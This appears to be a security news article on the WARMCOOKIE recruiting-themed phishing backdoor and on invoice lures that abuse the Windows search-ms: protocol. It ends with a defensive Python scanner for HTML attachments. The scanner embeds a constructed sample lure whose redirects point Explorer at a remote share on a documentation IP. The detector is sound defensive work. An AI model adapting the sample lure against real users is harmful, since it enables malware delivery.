Cybersecurity researchers have disclosed details of an ongoing phishing campaign that leverages recruiting- and job-themed lures to deliver a Windows-based backdoor named WARMCOOKIE.
“WARMCOOKIE appears to be an initial backdoor tool used to scout out victim networks and deploy additional payloads,” Elastic Security Labs researcher Daniel Stepanic said in a new analysis. “Each sample is compiled with a hard-coded [command-and-control] IP address and RC4 key.”
The backdoor comes with capabilities to fingerprint infected machines, capture screenshots, and drop additional malicious programs. The company is tracking the activity under the name REF6127.
The attack chains observed since late April involve the use of email messages purporting to be from recruitment firms like Hays, Michael Page, and PageGroup, urging recipients to click on an embedded link to view details about a job opportunity.
Users who end up clicking on the link are then prompted to download a document by solving a CAPTCHA challenge, after which a JavaScript file (“Update_23_04_2024_5689382.js”) is dropped.
“This obfuscated script runs PowerShell, kicking off the first task to load WARMCOOKIE,” Elastic said. “The PowerShell script abuses the Background Intelligent Transfer Service (BITS) to download WARMCOOKIE.”
A critical component of the campaign is the use of compromised infrastructure to host the initial phishing URL, which is then used to redirect victims to the appropriate landing page.
A Windows DLL, WARMCOOKIE follows a two-step process that allows for establishing persistence using a scheduled task and launching the core functionality, but not before performing a series of anti-analysis checks to evade detection.
The backdoor is designed to capture information about the infected host in a manner similar to an artifact used in connection with a previous campaign codenamed Resident that targeted manufacturing, industrial, and healthcare organizations.
It also supports commands to read from and write to files, execute commands using cmd.exe, fetch the list of installed applications, and capture screenshots.
“WARMCOOKIE is a newly discovered backdoor that is gaining popularity and is being used in campaigns targeting users across the globe,” Elastic said.
“The provided functionality is relatively straightforward, allowing threat groups that need a lightweight backdoor to monitor victims and deploy further damaging payloads such as ransomware.”
The disclosure comes as Trustwave SpiderLabs detailed a sophisticated phishing campaign that employs invoice-related decoys and takes advantage of the Windows search functionality embedded in HTML code to deploy malware.
The email messages carry a ZIP archive containing an HTML file, which uses the legacy Windows “search:” URI protocol handler to display a shortcut (LNK) file hosted on a remote server in Windows Explorer, giving the impression that it is a local search result.
“This LNK file points to a batch script (BAT) hosted on the same server, which, upon user click, could potentially trigger additional malicious operations,” Trustwave said, adding that it could not retrieve the batch script because the server was unresponsive.
It is worth noting that the abuse of search-ms: and search: as a malware distribution vector was documented by Trellix in July 2023.
“While this attack does not utilize automated installation of malware, it does require users to engage with various prompts and clicks,” the company said. “However, this technique cleverly obscures the attacker’s true intent, exploiting the trust users place in familiar interfaces and common actions like opening email attachments.”
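Because the lure in the Trustwave case is an ordinary HTML file, the search-protocol trick can be screened for at the mail gateway or in a sandbox before a user ever sees the Explorer window. The script below is an added example written for this page; it is not code from Trustwave, Elastic, or the article. It extracts `search:` and `search-ms:` URIs from an HTML attachment wherever they are typically embedded (link attributes, a meta refresh, or an inline JavaScript location assignment) and parses the `crumb=location:` and `displayname` parameters of Microsoft's documented search-ms syntax (which the article does not name) to reveal which remote host Explorer would be made to contact. The sample HTML is constructed for the demonstration and uses an RFC 5737 documentation address rather than any indicator from the campaign.

```python
import re
import html
from html.parser import HTMLParser
from urllib.parse import parse_qsl

# Windows protocol handlers that open an Explorer search window. A crumb=location:\\host\share
# parameter makes Explorer list files from a remote share as if they were local search results.
SEARCH_SCHEMES = ("search-ms:", "search:")

# Catches URIs assigned in inline JavaScript, e.g. window.location.href = "search-ms:..."
_JS_URI_RE = re.compile(r"""['"](search(?:-ms)?:[^'"]+)['"]""", re.IGNORECASE)
# Extracts the host portion of a UNC path such as \\203.0.113.10\share
_UNC_HOST_RE = re.compile(r"\\\\([^\\\s]+)")
# Pulls the target out of a <meta http-equiv="refresh" content="0; url=..."> attribute
_META_URL_RE = re.compile(r"url\s*=\s*(.+)", re.IGNORECASE)


class _LinkCollector(HTMLParser):
    """Collects every attribute value that can carry a navigable URI."""

    def __init__(self):
        super().__init__()
        self.uris = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if not value:
                continue
            if name == "content":
                m = _META_URL_RE.search(value)
                if not m:
                    continue
                value = m.group(1)
            if name in ("href", "src", "action", "content"):
                self.uris.append(value)


def parse_search_uri(uri):
    """Break a search:/search-ms: URI into its parameters and the remote host it points at."""
    scheme, _, rest = uri.partition(":")
    params = dict(parse_qsl(rest, keep_blank_values=True))
    crumb = params.get("crumb", "")          # e.g. location:\\203.0.113.10\share
    host_match = _UNC_HOST_RE.search(crumb)
    return {
        "scheme": scheme.lower(),
        "query": params.get("query"),
        "display_name": params.get("displayname"),   # what Explorer shows in the title bar
        "remote_host": host_match.group(1) if host_match else None,
        "uri": uri,
    }


def find_search_uris(html_text):
    """Return one finding per distinct search:/search-ms: URI reachable from the HTML."""
    collector = _LinkCollector()
    collector.feed(html_text)
    candidates = collector.uris + _JS_URI_RE.findall(html_text)
    seen = set()
    findings = []
    for raw in candidates:
        uri = html.unescape(raw).strip()
        if uri in seen:                      # same href is seen by both the parser and the JS regex
            continue
        seen.add(uri)
        if uri.lower().startswith(SEARCH_SCHEMES):
            findings.append(parse_search_uri(uri))
    return findings


def remote_hosts(html_text):
    """Sorted hosts an attachment would make Explorer connect to; an empty list means no such URI."""
    return sorted({f["remote_host"] for f in find_search_uris(html_text) if f["remote_host"]})


# Constructed sample standing in for the HTML file inside the ZIP attachment. The address is an
# RFC 5737 documentation IP, not an indicator from the campaign described in the article.
SAMPLE_HTML = """<html><head>
<meta http-equiv="refresh" content="0; url=search-ms:query=Invoice&crumb=location:\\\\203.0.113.10\\share&displayname=Downloads">
</head><body>
<a href="search:query=invoice&crumb=location:%5C%5C203.0.113.10%5Cshare&displayname=Downloads">Open invoice</a>
<script>window.location.href = "search-ms:query=Resume&crumb=location:\\\\203.0.113.10\\share&displayname=Downloads";</script>
</body></html>"""

if __name__ == "__main__":
    for finding in find_search_uris(SAMPLE_HTML):
        print(f"{finding['scheme']:<9} host={finding['remote_host']} "
              f"displayname={finding['display_name']} query={finding['query']}")
    print("remote hosts:", remote_hosts(SAMPLE_HTML))
```

Run it against each HTML file pulled out of a ZIP attachment; any non-empty result from `remote_hosts` is worth blocking or at least quarantining for review, since legitimate mail has no reason to drive Explorer to a remote share. The `displayname` value is also useful for triage, because the lure picks a name such as "Downloads" to make the remote listing look local.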